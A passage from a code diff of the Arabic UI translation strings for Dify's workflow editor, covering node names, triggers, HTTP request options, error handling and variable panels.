'مشغل سير عمل قائم على الوقت يبدأ سير العمل وفقًا لجدول زمني', + 'trigger-webhook': 'يتلقى مشغل Webhook دفعات HTTP من أنظمة خارجية لتشغيل سير العمل تلقائيًا.', + 'trigger-plugin': 'مشغل تكامل تابع لجهة خارجية يبدأ سير العمل من أحداث النظام الأساسي الخارجي', + }, + difyTeam: 'فريق Dify', + operator: { + zoomIn: 'تكبير', + zoomOut: 'تصغير', + zoomTo50: 'تكبير إلى 50%', + zoomTo100: 'تكبير إلى 100%', + zoomToFit: 'ملاءمة الشاشة', + alignNodes: 'محاذاة العقد', + alignLeft: 'يسار', + alignCenter: 'وسط', + alignRight: 'يمين', + alignTop: 'أعلى', + alignMiddle: 'وسط', + alignBottom: 'أسفل', + vertical: 'عمودي', + horizontal: 'أفقي', + distributeHorizontal: 'توزيع أفقي', + distributeVertical: 'توزيع عمودي', + selectionAlignment: 'محاذاة التحديد', + }, + variableReference: { + noAvailableVars: 'لا توجد متغيرات متاحة', + noVarsForOperation: 'لا توجد متغيرات متاحة للتعيين مع العملية المحددة.', + noAssignedVars: 'لا توجد متغيرات معينة متاحة', + assignedVarsDescription: 'يجب أن تكون المتغيرات المعينة متغيرات قابلة للكتابة، مثل ', + conversationVars: 'متغيرات المحادثة', + }, + panel: { + userInputField: 'حقل إدخال المستخدم', + changeBlock: 'تغيير العقدة', + helpLink: 'عرض المستندات', + openWorkflow: 'فتح سير العمل', + about: 'حول', + createdBy: 'تم الإنشاء بواسطة ', + nextStep: 'الخطوة التالية', + addNextStep: 'إضافة الخطوة التالية في هذا سير العمل', + selectNextStep: 'تحديد الخطوة التالية', + runThisStep: 'تشغيل هذه الخطوة', + checklist: 'قائمة المراجعة', + checklistTip: 'تأكد من حل جميع المشكلات قبل النشر', + checklistResolved: 'تم حل جميع المشكلات', + goTo: 'الذهاب إلى', + startNode: 'عقدة البداية', + organizeBlocks: 'تنظيم العقد', + change: 'تغيير', + optional: '(اختياري)', + maximize: 'تكبير القماش', + minimize: 'خروج من وضع ملء الشاشة', + scrollToSelectedNode: 'تمرير إلى العقدة المحددة', + optional_and_hidden: '(اختياري ومخفي)', + }, + nodes: { + common: { + outputVars: 'متغيرات الإخراج', + insertVarTip: 'إدراج متغير', + memory: { + memory: 'الذاكرة', + memoryTip: 'إعدادات ذاكرة الدردشة', + windowSize: 'حجم النافذة', + conversationRoleName: 'اسم دور المحادثة', + user: 'بادئة المستخدم', + assistant: 'بادئة المساعد', + }, + memories: { + title: 'الذكريات', + tip: 'ذاكرة الدردشة', + builtIn: 'مدمج', + }, + errorHandle: { + title: 'معالجة الأخطاء', + tip: 'استراتيجية التعامل مع الاستثناءات، يتم تشغيلها عندما تواجه العقدة استثناءً.', + none: { + title: 'لا شيء', + desc: 'ستتوقف العقدة عن العمل في حالة حدوث استثناء ولم يتم التعامل معه', }, - drag: { - title: 'سحب', - desc: ' للتوصيل', + defaultValue: { + title: 'القيم الافتراضية', + desc: 'عند حدوث خطأ، حدد محتوى إخراج ثابت.', + tip: 'عند الخطأ، سيعود القيمة أدناه.', + inLog: 'استثناء العقدة، الإخراج وفقًا للقيم الافتراضية.', + output: 'إخراج القيمة الافتراضية', }, - limit: 'يقتصر التوازي على {{num}} فروع.', - depthLimit: 'حد طبقة التداخل المتوازي {{num}} طبقات', - }, - disconnect: 'قطع الاتصال', - jumpToNode: 'القفز إلى هذه العقدة', - addParallelNode: 'إضافة عقدة متوازية', - parallel: 'توازي', - branch: 'فرع', - onFailure: 'عند الفشل', - addFailureBranch: 'إضافة فرع فشل', - loadMore: 'تحميل المزيد', - noHistory: 'لا يوجد سجل', - tagBound: 'عدد التطبيقات التي تستخدم هذه العلامة', - }, - publishLimit: { - startNodeTitlePrefix: 'قم بالترقية إلى', - startNodeTitleSuffix: 'فتح مشغلات غير محدودة لكل سير عمل', - startNodeDesc: 'لقد وصلت إلى الحد المسموح به وهو 2 مشغلات لكل سير عمل لهذه الخطة. قم بالترقية لنشر سير العمل هذا.', - }, - env: { - envPanelTitle: 'متغيرات البيئة', - envDescription: 'يمكن استخدام متغيرات البيئة لتخزين المعلومات الخاصة وبيانات الاعتماد. فهي للقراءة فقط ويمكن فصلها عن ملف DSL أثناء التصدير.', - envPanelButton: 'إضافة متغير', - modal: { - title: 'إضافة متغير بيئة', - editTitle: 'تعديل متغير بيئة', - type: 'النوع', - name: 'الاسم', - namePlaceholder: 'اسم المتغير', - value: 'القيمة', - valuePlaceholder: 'قيمة المتغير', - secretTip: 'يستخدم لتحديد معلومات أو بيانات حساسة، مع إعدادات DSL المكونة لمنع التسرب.', - description: 'الوصف', - descriptionPlaceholder: 'وصف المتغير', - }, - export: { - title: 'تصدير متغيرات البيئة السرية؟', - checkbox: 'تصدير القيم السرية', - ignore: 'تصدير DSL', - export: 'تصدير DSL مع القيم السرية ', - }, - }, - globalVar: { - title: 'متغيرات النظام', - description: 'متغيرات النظام هي متغيرات عامة يمكن الإشارة إليها بواسطة أي عقدة دون توصيل عندما يكون النوع صحيحًا، مثل معرف المستخدم ومعرف سير العمل.', - fieldsDescription: { - conversationId: 'معرف المحادثة', - dialogCount: 'عدد المحادثات', - userId: 'معرف المستخدم', - triggerTimestamp: 'توقيت بدء التطبيق', - appId: 'معرف التطبيق', - workflowId: 'معرف سير العمل', - workflowRunId: 'معرف تشغيل سير العمل', - }, - }, - sidebar: { - exportWarning: 'تصدير النسخة المحفوظة الحالية', - exportWarningDesc: 'سيؤدي هذا إلى تصدير النسخة المحفوظة الحالية من سير العمل الخاص بك. إذا كانت لديك تغييرات غير محفوظة في المحرر، يرجى حفظها أولاً باستخدام خيار التصدير في لوحة سير العمل.', - }, - chatVariable: { - panelTitle: 'متغيرات المحادثة', - panelDescription: 'تستخدم متغيرات المحادثة لتخزين المعلومات التفاعلية التي يحتاج LLM إلى تذكرها، بما في ذلك سجل المحادثة والملفات التي تم تحميلها وتفضيلات المستخدم. هم للقراءة والكتابة. ', - docLink: 'قم بزيارة مستنداتنا لمعرفة المزيد.', - button: 'إضافة متغير', - modal: { - title: 'إضافة متغير محادثة', - editTitle: 'تعديل متغير محادثة', - name: 'الاسم', - namePlaceholder: 'اسم المتغير', - type: 'النوع', - value: 'القيمة الافتراضية', - valuePlaceholder: 'القيمة الافتراضية، اتركها فارغة لعدم التعيين', - description: 'الوصف', - descriptionPlaceholder: 'وصف المتغير', - editInJSON: 'تعديل في JSON', - oneByOne: 'إضافة واحدة تلو الأخرى', - editInForm: 'تعديل في النموذج', - arrayValue: 'القيمة', - addArrayValue: 'إضافة قيمة', - objectKey: 'مفتاح', - objectType: 'النوع', - objectValue: 'القيمة الافتراضية', - }, - storedContent: 'المحتوى المخزن', - updatedAt: 'تم التحديث في ', - }, - changeHistory: { - title: 'سجل التغييرات', - placeholder: 'لم تقم بتغيير أي شيء بعد', - clearHistory: 'مسح السجل', - hint: 'تلميح', - hintText: 'يتم تتبع إجراءات التحرير الخاصة بك في سجل التغييرات، والذي يتم تخزينه على جهازك طوال مدة هذه الجلسة. سيتم مسح هذا السجل عند مغادرة المحرر.', - stepBackward_one: '{{count}} خطوة إلى الوراء', - stepBackward_other: '{{count}} خطوات إلى الوراء', - stepForward_one: '{{count}} خطوة إلى الأمام', - stepForward_other: '{{count}} خطوات إلى الأمام', - sessionStart: 'بدء الجلسة', - currentState: 'الحالة الحالية', - nodeTitleChange: 'تم تغيير عنوان العقدة', - nodeDescriptionChange: 'تم تغيير وصف العقدة', - nodeDragStop: 'تم نقل العقدة', - nodeChange: 'تم تغيير العقدة', - nodeConnect: 'تم توصيل العقدة', - nodePaste: 'تم لصق العقدة', - nodeDelete: 'تم حذف العقدة', - nodeAdd: 'تم إضافة العقدة', - nodeResize: 'تم تغيير حجم العقدة', - noteAdd: 'تم إضافة ملاحظة', - noteChange: 'تم تغيير الملاحظة', - noteDelete: 'تم حذف الملاحظة', - edgeDelete: 'تم قطع اتصال العقدة', - }, - errorMsg: { - fieldRequired: '{{field}} مطلوب', - rerankModelRequired: 'مطلوب تكوين نموذج Rerank', - authRequired: 'الترخيص مطلوب', - invalidJson: '{{field}} هو JSON غير صالح', - fields: { - variable: 'اسم المتغير', - variableValue: 'قيمة المتغير', - code: 'الكود', - model: 'النموذج', - rerankModel: 'نموذج Rerank المكون', - visionVariable: 'متغير الرؤية', - }, - invalidVariable: 'متغير غير صالح', - noValidTool: '{{field}} لا توجد أداة صالحة محددة', - toolParameterRequired: '{{field}}: المعلمة [{{param}}] مطلوبة', - startNodeRequired: 'الرجاء إضافة عقدة البداية أولاً قبل {{operation}}', - }, - error: { - startNodeRequired: 'الرجاء إضافة عقدة البداية أولاً قبل {{operation}}', - operations: { - connectingNodes: 'توصيل العقد', - addingNodes: 'إضافة العقد', - modifyingWorkflow: 'تعديل سير العمل', - updatingWorkflow: 'تحديث سير العمل', - }, - }, - singleRun: { - testRun: 'تشغيل اختياري', - startRun: 'بدء التشغيل', - preparingDataSource: 'تحضير مصدر البيانات', - reRun: 'إعادة التشغيل', - running: 'جارٍ التشغيل', - testRunIteration: 'تكرار تشغيل الاختبار', - back: 'خلف', - iteration: 'تكرار', - loop: 'حلقة', - }, - tabs: { - 'searchBlock': 'بحث عن عقدة', - 'start': 'البداية', - 'blocks': 'العقد', - 'searchTool': 'أداة البحث', - 'searchTrigger': 'بحث عن المشغلات...', - 'allTriggers': 'كل المشغلات', - 'tools': 'الأدوات', - 'allTool': 'الكل', - 'plugin': 'الإضافة', - 'customTool': 'مخصص', - 'workflowTool': 'سير العمل', - 'question-understand': 'فهم السؤال', - 'logic': 'المنطق', - 'transform': 'تحويل', - 'utilities': 'الأدوات المساعدة', - 'noResult': 'لم يتم العثور على تطابق', - 'noPluginsFound': 'لم يتم العثور على إضافات', - 'requestToCommunity': 'طلبات للمجتمع', - 'agent': 'استراتيجية الوكيل', - 'allAdded': 'تمت إضافة الكل', - 'addAll': 'إضافة الكل', - 'sources': 'المصادر', - 'searchDataSource': 'بحث في مصدر البيانات', - 'featuredTools': 'المميزة', - 'showMoreFeatured': 'عرض المزيد', - 'showLessFeatured': 'عرض أقل', - 'installed': 'مثبت', - 'pluginByAuthor': 'بواسطة {{author}}', - 'usePlugin': 'حدد الأداة', - 'hideActions': 'إخفاء الأدوات', - 'noFeaturedPlugins': 'اكتشف المزيد من الأدوات في السوق', - 'noFeaturedTriggers': 'اكتشف المزيد من المشغلات في السوق', - 'startDisabledTip': 'تتعارض عقدة المشغل وعقدة إدخال المستخدم.', - }, - blocks: { - 'start': 'إدخال المستخدم', - 'originalStartNode': 'عقدة البداية الأصلية', - 'end': 'الإخراج', - 'answer': 'إجابة', - 'llm': 'LLM', - 'knowledge-retrieval': 'استرجاع المعرفة', - 'question-classifier': 'مصنف الأسئلة', - 'if-else': 'IF/ELSE', - 'code': 'كود', - 'template-transform': 'قالب', - 'http-request': 'طلب HTTP', - 'variable-assigner': 'مجمع المتغيرات', - 'variable-aggregator': 'مجمع المتغيرات', - 'assigner': 'معين المتغيرات', - 'iteration-start': 'بداية التكرار', - 'iteration': 'تكرار', - 'parameter-extractor': 'مستخرج المعلمات', - 'document-extractor': 'مستخرج المستندات', - 'list-operator': 'مشغل القائمة', - 'agent': 'وكيل', - 'loop-start': 'بداية الحلقة', - 'loop': 'حلقة', - 'loop-end': 'خروج من الحلقة', - 'knowledge-index': 'قاعدة المعرفة', - 'datasource': 'مصدر البيانات', - 'trigger-schedule': 'جدولة المشغل', - 'trigger-webhook': 'مشغل الويب هوك', - 'trigger-plugin': 'مشغل الإضافة', - }, - customWebhook: 'ويب هوك مخصص', - blocksAbout: { - 'start': 'تحديد المعلمات الأولية لبدء سير العمل', - 'end': 'تحديد الإخراج ونوع النتيجة لسير العمل', - 'answer': 'تحديد محتوى الرد لمحادثة الدردشة', - 'llm': 'استدعاء نماذج اللغة الكبيرة للإجابة على الأسئلة أو معالجة اللغة الطبيعية', - 'knowledge-retrieval': 'يسمح لك بالاستعلام عن محتوى النص المتعلق بأسئلة المستخدم من المعرفة', - 'question-classifier': 'تحديد شروط تصنيف أسئلة المستخدم، يمكن لـ LLM تحديد كيفية تقدم المحادثة بناءً على وصف التصنيف', - 'if-else': 'يسمح لك بتقسيم سير العمل إلى فرعين بناءً على شروط if/else', - 'code': 'تنفيذ قطعة من كود Python أو NodeJS لتنفيذ منطق مخصص', - 'template-transform': 'تحويل البيانات إلى سلسلة باستخدام بنية قالب Jinja', - 'http-request': 'السماح بإرسال طلبات الخادم عبر بروتوكول HTTP', - 'variable-assigner': 'تجميع متغيرات متعددة الفروع في متغير واحد للتكوين الموحد للعقد النهائية.', - 'assigner': 'تُستخدم عقدة تعيين المتغير لتعيين قيم للمتغيرات القابلة للكتابة (مثل متغيرات المحادثة).', - 'variable-aggregator': 'تجميع متغيرات متعددة الفروع في متغير واحد للتكوين الموحد للعقد النهائية.', - 'iteration': 'تنفيذ خطوات متعددة على كائن قائمة حتى يتم إخراج جميع النتائج.', - 'loop': 'تنفيذ حلقة من المنطق حتى يتم استيفاء شروط الإنهاء أو الوصول إلى الحد الأقصى لعدد الحلقات.', - 'loop-end': 'يعادل "break". هذه العقدة لا تحتوي على عناصر تكوين. عندما يصل جسم الحلقة إلى هذه العقدة، تنتهي الحلقة.', - 'parameter-extractor': 'استخدم LLM لاستخراج المعلمات الهيكلية من اللغة الطبيعية لاستدعاء الأدوات أو طلبات HTTP.', - 'document-extractor': 'تستخدم لتحليل المستندات التي تم تحميلها إلى محتوى نصي يسهل فهمه بواسطة LLM.', - 'list-operator': 'تستخدم لتصفية أو فرز محتوى المصفوفة.', - 'agent': 'استدعاء نماذج اللغة الكبيرة للإجابة على الأسئلة أو معالجة اللغة الطبيعية', - 'knowledge-index': 'حول قاعدة المعرفة', - 'datasource': 'حول مصدر البيانات', - 'trigger-schedule': 'مشغل سير عمل قائم على الوقت يبدأ سير العمل وفقًا لجدول زمني', - 'trigger-webhook': 'يتلقى مشغل Webhook دفعات HTTP من أنظمة خارجية لتشغيل سير العمل تلقائيًا.', - 'trigger-plugin': 'مشغل تكامل تابع لجهة خارجية يبدأ سير العمل من أحداث النظام الأساسي الخارجي', - }, - difyTeam: 'فريق Dify', - operator: { - zoomIn: 'تكبير', - zoomOut: 'تصغير', - zoomTo50: 'تكبير إلى 50%', - zoomTo100: 'تكبير إلى 100%', - zoomToFit: 'ملاءمة الشاشة', - alignNodes: 'محاذاة العقد', - alignLeft: 'يسار', - alignCenter: 'وسط', - alignRight: 'يمين', - alignTop: 'أعلى', - alignMiddle: 'وسط', - alignBottom: 'أسفل', - vertical: 'عمودي', - horizontal: 'أفقي', - distributeHorizontal: 'توزيع أفقي', - distributeVertical: 'توزيع عمودي', - selectionAlignment: 'محاذاة التحديد', - }, - variableReference: { - noAvailableVars: 'لا توجد متغيرات متاحة', - noVarsForOperation: 'لا توجد متغيرات متاحة للتعيين مع العملية المحددة.', - noAssignedVars: 'لا توجد متغيرات معينة متاحة', - assignedVarsDescription: 'يجب أن تكون المتغيرات المعينة متغيرات قابلة للكتابة، مثل ', - conversationVars: 'متغيرات المحادثة', - }, - panel: { - userInputField: 'حقل إدخال المستخدم', - changeBlock: 'تغيير العقدة', - helpLink: 'عرض المستندات', - openWorkflow: 'فتح سير العمل', - about: 'حول', - createdBy: 'تم الإنشاء بواسطة ', - nextStep: 'الخطوة التالية', - addNextStep: 'إضافة الخطوة التالية في هذا سير العمل', - selectNextStep: 'تحديد الخطوة التالية', - runThisStep: 'تشغيل هذه الخطوة', - checklist: 'قائمة المراجعة', - checklistTip: 'تأكد من حل جميع المشكلات قبل النشر', - checklistResolved: 'تم حل جميع المشكلات', - goTo: 'الذهاب إلى', - startNode: 'عقدة البداية', - organizeBlocks: 'تنظيم العقد', - change: 'تغيير', - optional: '(اختياري)', - maximize: 'تكبير القماش', - minimize: 'خروج من وضع ملء الشاشة', - scrollToSelectedNode: 'تمرير إلى العقدة المحددة', - optional_and_hidden: '(اختياري ومخفي)', - }, - nodes: { - common: { - outputVars: 'متغيرات الإخراج', - insertVarTip: 'إدراج متغير', - memory: { - memory: 'الذاكرة', - memoryTip: 'إعدادات ذاكرة الدردشة', - windowSize: 'حجم النافذة', - conversationRoleName: 'اسم دور المحادثة', - user: 'بادئة المستخدم', - assistant: 'بادئة المساعد', + failBranch: { + title: 'فرع الفشل', + desc: 'عند حدوث خطأ، سيتم تنفيذ فرع الاستثناء', + customize: 'انتقل إلى القماش لتخصيص منطق فرع الفشل.', + customizeTip: 'عند تنشيط فرع الفشل، لن تؤدي الاستثناءات التي تطرحها العقد إلى إنهاء العملية. بدلاً من ذلك، سيتم تنفيذ فرع الفشل المحدد مسبقًا تلقائيًا، مما يسمح لك بتقديم رسائل خطأ، وتقارير، وإصلاحات، أو اتخاذ إجراءات تخطي بمرونة.', + inLog: 'استثناء العقدة، سيتم تلقائيًا تنفيذ فرع الفشل. سيعيد إخراج العقدة نوع خطأ ورسالة خطأ ويمررهما إلى المصب.', }, + partialSucceeded: { + tip: 'هناك {{num}} عقد في العملية تعمل بشكل غير طبيعي، يرجى الانتقال إلى التتبع للتحقق من السجلات.', + }, + }, + retry: { + retry: 'إعادة المحاولة', + retryOnFailure: 'إعادة المحاولة عند الفشل', + maxRetries: 'الحد الأقصى لإعادة المحاولة', + retryInterval: 'فاصل إعادة المحاولة', + retryTimes: 'أعد المحاولة {{times}} مرات عند الفشل', + retrying: 'جارٍ إعادة المحاولة...', + retrySuccessful: 'تمت إعادة المحاولة بنجاح', + retryFailed: 'فشلت إعادة المحاولة', + retryFailedTimes: 'فشلت {{times}} إعادة المحاولة', + times: 'مرات', + ms: 'مللي ثانية', + retries: '{{num}} إعادة محاولة', + }, + typeSwitch: { + input: 'قيمة الإدخال', + variable: 'استخدام متغير', + }, + inputVars: 'متغيرات الإدخال', + pluginNotInstalled: 'الإضافة غير مثبتة', + }, + start: { + required: 'مطلوب', + inputField: 'حقل الإدخال', + builtInVar: 'المتغيرات المدمجة', + outputVars: { + query: 'إدخال المستخدم', memories: { - title: 'الذكريات', - tip: 'ذاكرة الدردشة', - builtIn: 'مدمج', + des: 'سجل المحادثة', + type: 'نوع الرسالة', + content: 'محتوى الرسالة', }, - errorHandle: { - title: 'معالجة الأخطاء', - tip: 'استراتيجية التعامل مع الاستثناءات، يتم تشغيلها عندما تواجه العقدة استثناءً.', - none: { - title: 'لا شيء', - desc: 'ستتوقف العقدة عن العمل في حالة حدوث استثناء ولم يتم التعامل معه', - }, - defaultValue: { - title: 'القيم الافتراضية', - desc: 'عند حدوث خطأ، حدد محتوى إخراج ثابت.', - tip: 'عند الخطأ، سيعود القيمة أدناه.', - inLog: 'استثناء العقدة، الإخراج وفقًا للقيم الافتراضية.', - output: 'إخراج القيمة الافتراضية', - }, - failBranch: { - title: 'فرع الفشل', - desc: 'عند حدوث خطأ، سيتم تنفيذ فرع الاستثناء', - customize: 'انتقل إلى القماش لتخصيص منطق فرع الفشل.', - customizeTip: 'عند تنشيط فرع الفشل، لن تؤدي الاستثناءات التي تطرحها العقد إلى إنهاء العملية. بدلاً من ذلك، سيتم تنفيذ فرع الفشل المحدد مسبقًا تلقائيًا، مما يسمح لك بتقديم رسائل خطأ، وتقارير، وإصلاحات، أو اتخاذ إجراءات تخطي بمرونة.', - inLog: 'استثناء العقدة، سيتم تلقائيًا تنفيذ فرع الفشل. سيعيد إخراج العقدة نوع خطأ ورسالة خطأ ويمررهما إلى المصب.', - }, - partialSucceeded: { - tip: 'هناك {{num}} عقد في العملية تعمل بشكل غير طبيعي، يرجى الانتقال إلى التتبع للتحقق من السجلات.', - }, - }, - retry: { - retry: 'إعادة المحاولة', - retryOnFailure: 'إعادة المحاولة عند الفشل', - maxRetries: 'الحد الأقصى لإعادة المحاولة', - retryInterval: 'فاصل إعادة المحاولة', - retryTimes: 'أعد المحاولة {{times}} مرات عند الفشل', - retrying: 'جارٍ إعادة المحاولة...', - retrySuccessful: 'تمت إعادة المحاولة بنجاح', - retryFailed: 'فشلت إعادة المحاولة', - retryFailedTimes: 'فشلت {{times}} إعادة المحاولة', - times: 'مرات', - ms: 'مللي ثانية', - retries: '{{num}} إعادة محاولة', - }, - typeSwitch: { - input: 'قيمة الإدخال', - variable: 'استخدام متغير', - }, - inputVars: 'متغيرات الإدخال', + files: 'قائمة الملفات', }, - start: { - required: 'مطلوب', - inputField: 'حقل الإدخال', - builtInVar: 'المتغيرات المدمجة', - outputVars: { - query: 'إدخال المستخدم', - memories: { - des: 'سجل المحادثة', - type: 'نوع الرسالة', - content: 'محتوى الرسالة', - }, - files: 'قائمة الملفات', - }, - noVarTip: 'تعيين المدخلات التي يمكن استخدامها في سير العمل', + noVarTip: 'تعيين المدخلات التي يمكن استخدامها في سير العمل', + }, + end: { + outputs: 'المخرجات', + output: { + type: 'نوع الإخراج', + variable: 'متغير الإخراج', }, - end: { - outputs: 'المخرجات', - output: { - type: 'نوع الإخراج', - variable: 'متغير الإخراج', - }, - type: { - 'none': 'لا شيء', - 'plain-text': 'نص عادي', - 'structured': 'منظم', - }, + type: { + 'none': 'لا شيء', + 'plain-text': 'نص عادي', + 'structured': 'منظم', }, - answer: { - answer: 'إجابة', - outputVars: 'متغيرات الإخراج', + }, + answer: { + answer: 'إجابة', + outputVars: 'متغيرات الإخراج', + }, + llm: { + model: 'النموذج', + variables: 'المتغيرات', + context: 'السياق', + contextTooltip: 'يمكنك استيراد المعرفة كسياق', + notSetContextInPromptTip: 'لتمكين ميزة السياق، يرجى ملء متغير السياق في PROMPT.', + prompt: 'المطالبة', + roleDescription: { + system: 'أعط تعليمات عالية المستوى للمحادثة', + user: 'قدم تعليمات أو استفسارات أو أي إدخال نصي للنموذج', + assistant: 'استجابات النموذج بناءً على رسائل المستخدم', }, - llm: { - model: 'النموذج', - variables: 'المتغيرات', - context: 'السياق', - contextTooltip: 'يمكنك استيراد المعرفة كسياق', - notSetContextInPromptTip: 'لتمكين ميزة السياق، يرجى ملء متغير السياق في PROMPT.', - prompt: 'المطالبة', - roleDescription: { - system: 'أعط تعليمات عالية المستوى للمحادثة', - user: 'قدم تعليمات أو استفسارات أو أي إدخال نصي للنموذج', - assistant: 'استجابات النموذج بناءً على رسائل المستخدم', - }, - addMessage: 'إضافة رسالة', - vision: 'الرؤية', - files: 'الملفات', - resolution: { - name: 'الدقة', - high: 'عالية', - low: 'منخفضة', - }, - outputVars: { - output: 'إنشاء محتوى', - reasoning_content: 'محتوى التفكير', - usage: 'معلومات استخدام النموذج', - }, - singleRun: { - variable: 'متغير', - }, - sysQueryInUser: 'sys.query في رسالة المستخدم مطلوب', - reasoningFormat: { - title: 'تمكين فصل علامة التفكير', - tagged: 'الاحتفاظ بعلامات التفكير', - separated: 'فصل علامات التفكير', - tooltip: 'استخراج المحتوى من علامات التفكير وتخزينه في حقل content_reasoning.', - }, - jsonSchema: { - title: 'مخطط الإخراج المنظم', - instruction: 'تعليمات', - promptTooltip: 'تحويل الوصف النصي إلى هيكل مخطط JSON موحد.', - promptPlaceholder: 'صف مخطط JSON الخاص بك ...', - generate: 'توليد', - import: 'استيراد من JSON', - generateJsonSchema: 'توليد مخطط JSON', - generationTip: 'يمكنك استخدام اللغة الطبيعية لإنشاء مخطط JSON بسرعة.', - generating: 'توليد مخطط JSON ...', - generatedResult: 'النتائج المولدة', - resultTip: 'إليك النتائج المولدة. إذا لم تكن راضيًا، يمكنك العودة وتعديل مطالبتك.', - back: 'رجوع', - regenerate: 'إعادة التوليد', - apply: 'تطبيق', - doc: 'معرفة المزيد عن الإخراج المنظم', - resetDefaults: 'إعادة تعيين', - required: 'مطلوب', - addField: 'إضافة حقل', - addChildField: 'إضافة حقل فرعي', - showAdvancedOptions: 'عرض الخيارات المتقدمة', - stringValidations: 'التحقق من صحة السلسلة', - fieldNamePlaceholder: 'اسم الحقل', - descriptionPlaceholder: 'إضافة وصف', - warningTips: { - saveSchema: 'الرجاء إنهاء تحرير الحقل الحالي قبل حفظ المخطط', - }, - }, + addMessage: 'إضافة رسالة', + vision: 'الرؤية', + files: 'الملفات', + resolution: { + name: 'الدقة', + high: 'عالية', + low: 'منخفضة', }, - knowledgeRetrieval: { - queryVariable: 'متغير الاستعلام', - knowledge: 'المعرفة', - outputVars: { - output: 'استرجاع البيانات المقسمة', - content: 'المحتوى المقسم', - title: 'العنوان المقسم', - icon: 'أيقونة مقسمة', - url: 'عنوان URL المقسم', - metadata: 'بيانات وصفية أخرى', - files: 'الملفات المسترجعة', - }, - metadata: { - title: 'تصفية البيانات الوصفية', - tip: 'تصفية البيانات الوصفية هي عملية استخدام سمات البيانات الوصفية (مثل العلامات، الفئات، أو أذونات الوصول) لتحسين والتحكم في استرجاع المعلومات ذات الصلة داخل النظام.', - options: { - disabled: { - title: 'معطل', - subTitle: 'عدم تمكين تصفية البيانات الوصفية', - }, - automatic: { - title: 'تلقائي', - subTitle: 'إنشاء شروط تصفية البيانات الوصفية تلقائيًا بناءً على استعلام المستخدم', - desc: 'إنشاء شروط تصفية البيانات الوصفية تلقائيًا بناءً على متغير الاستعلام', - }, - manual: { - title: 'يدوي', - subTitle: 'إضافة شروط تصفية البيانات الوصفية يدويًا', - }, - }, - panel: { - title: 'شروط تصفية البيانات الوصفية', - conditions: 'الشروط', - add: 'إضافة شرط', - search: 'بحث في البيانات الوصفية', - placeholder: 'أدخل قيمة', - datePlaceholder: 'اختر وقتًا...', - select: 'حدد متغيرًا...', - }, - }, - queryText: 'نص الاستعلام', - queryAttachment: 'استعلام الصور', + outputVars: { + output: 'إنشاء محتوى', + reasoning_content: 'محتوى التفكير', + usage: 'معلومات استخدام النموذج', }, - http: { - inputVars: 'متغيرات الإدخال', - api: 'API', - apiPlaceholder: 'أدخل URL، واكتب \'/\' لإدراج متغير', - extractListPlaceholder: 'أدخل فهرس عنصر القائمة، واكتب \'/\' لإدراج متغير', - notStartWithHttp: 'يجب أن يبدأ API بـ http:// أو https://', - key: 'المفتاح', - type: 'النوع', - value: 'القيمة', - bulkEdit: 'تحرير مجمع', - keyValueEdit: 'تحرير المفتاح والقيمة', - headers: 'الرؤوس', - params: 'المعلمات', - body: 'الجسم', - binaryFileVariable: 'متغير ملف ثنائي', - outputVars: { - body: 'محتوى الاستجابة', - statusCode: 'رمز حالة الاستجابة', - headers: 'قائمة رؤوس الاستجابة JSON', - files: 'قائمة الملفات', - }, - authorization: { - 'authorization': 'تخويل', - 'authorizationType': 'نوع التخويل', - 'no-auth': 'لا شيء', - 'api-key': 'مفتاح API', - 'auth-type': 'نوع المصادقة', - 'basic': 'أساسي', - 'bearer': 'Bearer', - 'custom': 'مخصص', - 'api-key-title': 'مفتاح API', - 'header': 'Header', - }, - insertVarPlaceholder: 'اكتب \'/\' لإدراج متغير', - timeout: { - title: 'المهلة', - connectLabel: 'مهلة الاتصال', - connectPlaceholder: 'أدخل مهلة الاتصال بالثواني', - readLabel: 'مهلة القراءة', - readPlaceholder: 'أدخل مهلة القراءة بالثواني', - writeLabel: 'مهلة الكتابة', - writePlaceholder: 'أدخل مهلة الكتابة بالثواني', - }, - curl: { - title: 'استيراد من cURL', - placeholder: 'لصق سلسلة cURL هنا', - }, - verifySSL: { - title: 'التحقق من شهادة SSL', - warningTooltip: 'لا يوصى بتعطيل التحقق من SSL لبيئات الإنتاج. يجب استخدامه فقط في التطوير أو الاختبار، حيث إنه يجعل الاتصال عرضة لتهديدات الأمان مثل هجمات الوسيط.', - }, + singleRun: { + variable: 'متغير', }, - code: { - inputVars: 'متغيرات الإدخال', - outputVars: 'متغيرات الإخراج', - advancedDependencies: 'التبعيات المتقدمة', - advancedDependenciesTip: 'أضف بعض التبعيات المحملة مسبقًا التي تستغرق وقتًا أطول للاستهلاك أو ليست افتراضية مضمنة هنا', - searchDependencies: 'بحث في التبعيات', - syncFunctionSignature: 'مزامنة توقيع الوظيفة للكود', + sysQueryInUser: 'sys.query في رسالة المستخدم مطلوب', + reasoningFormat: { + title: 'تمكين فصل علامة التفكير', + tagged: 'الاحتفاظ بعلامات التفكير', + separated: 'فصل علامات التفكير', + tooltip: 'استخراج المحتوى من علامات التفكير وتخزينه في حقل content_reasoning.', }, - templateTransform: { - inputVars: 'متغيرات الإدخال', - code: 'الكود', - codeSupportTip: 'يدعم Jinja2 فقط', - outputVars: { - output: 'المحتوى المحول', - }, - }, - ifElse: { - if: 'If', - else: 'Else', - elseDescription: 'يستخدم لتحديد المنطق الذي ينبغي تنفيذه عندما لا يتم استيفاء شرط if.', - and: 'و', - or: 'أو', - operator: 'المشغل', - notSetVariable: 'الرجاء تعيين المتغير أولاً', - comparisonOperator: { - 'contains': 'يحتوي على', - 'not contains': 'لا يحتوي على', - 'start with': 'يبدأ بـ', - 'end with': 'ينتهي بـ', - 'is': 'هو', - 'is not': 'ليس', - 'empty': 'فارغ', - 'not empty': 'ليس فارغًا', - 'null': 'null', - 'not null': 'ليس null', - 'in': 'في', - 'not in': 'ليس في', - 'all of': 'كل من', - 'exists': 'موجود', - 'not exists': 'غير موجود', - 'before': 'قبل', - 'after': 'بعد', - }, - optionName: { - image: 'صورة', - doc: 'مستند', - audio: 'صوت', - video: 'فيديو', - localUpload: 'تحميل محلي', - url: 'URL', - }, - enterValue: 'أدخل قيمة', - addCondition: 'إضافة شرط', - conditionNotSetup: 'لم يتم إعداد الشرط', - selectVariable: 'حدد متغيرًا...', - addSubVariable: 'متغير فرعي', - select: 'تحديد', - }, - variableAssigner: { - title: 'تعيين المتغيرات', - outputType: 'نوع الإخراج', - varNotSet: 'المتغير غير معين', - noVarTip: 'أضف المتغيرات التي سيتم تعيينها', - type: { - string: 'سلسلة', - number: 'رقم', - object: 'كائن', - array: 'مصفوفة', - }, - aggregationGroup: 'مجموعة التجميع', - 